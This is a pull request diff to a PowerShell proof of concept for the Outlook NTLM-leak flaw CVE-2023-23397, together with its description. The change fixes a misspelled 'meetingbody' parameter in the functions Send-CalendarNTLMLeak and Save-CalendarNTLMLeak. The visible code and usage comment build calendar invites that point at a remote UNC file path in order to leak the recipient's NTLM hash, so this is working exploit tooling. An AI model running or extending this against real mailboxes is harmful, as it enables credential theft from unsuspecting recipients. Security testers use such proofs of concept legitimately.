### PR TITLE
Update meetingbody variable name

### DIFF
--- a/CVE-2023-23397.ps1
+++ b/CVE-2023-23397.ps1
@@ -15,7 +15,7 @@
 # Save-CalendarNTLMLeak -remotefilepath "\\files.domain.com@SSL@443\file.wav" -meetingsubject "Test Meeting" -meetingbody "Just a test meeting from IT, can be deleted"
 
 
-function Send-CalendarNTLMLeak ($recipient, $remotefilepath, $meetingsubject, $meeetingbody)
+function Send-CalendarNTLMLeak ($recipient, $remotefilepath, $meetingsubject, $meetingbody)
 {
     $Outlook = New-Object -comObject Outlook.Application
     $newcal = $outlook.CreateItem('olAppointmentItem')
@@ -33,7 +33,7 @@ function Send-CalendarNTLMLeak ($recipient, $remotefilepath, $meetingsubject, $m
     $newcal.send()
 }
 
-function Save-CalendarNTLMLeak ($remotefilepath, $meetingsubject, $meeetingbody)
+function Save-CalendarNTLMLeak ($remotefilepath, $meetingsubject, $meetingbody)
 {
     $Outlook = New-Object -comObject Outlook.Application
     $newcal = $outlook.CreateItem('olAppointmentItem')


### PR DESCRIPTION
Removed extra 'e' char within meetingbody that was causing the body not to pass correctly to the Outlook Object.